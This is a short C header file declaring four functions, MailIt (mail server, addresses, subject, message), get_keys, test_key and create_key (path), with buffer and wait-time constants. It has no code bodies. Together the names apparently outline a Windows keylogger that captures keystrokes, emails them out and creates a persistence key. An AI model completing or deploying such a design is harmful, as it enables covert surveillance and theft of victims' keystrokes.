#pragma once

#include <stdio.h>
#include <tchar.h>

#define BUFSIZE 800
#define waittime 500

int MailIt (char *mailserver, char *emailto, char *emailfrom, char *emailsubject, char *emailmessage);
int get_keys();
int test_key(void);
int create_key(char *path);
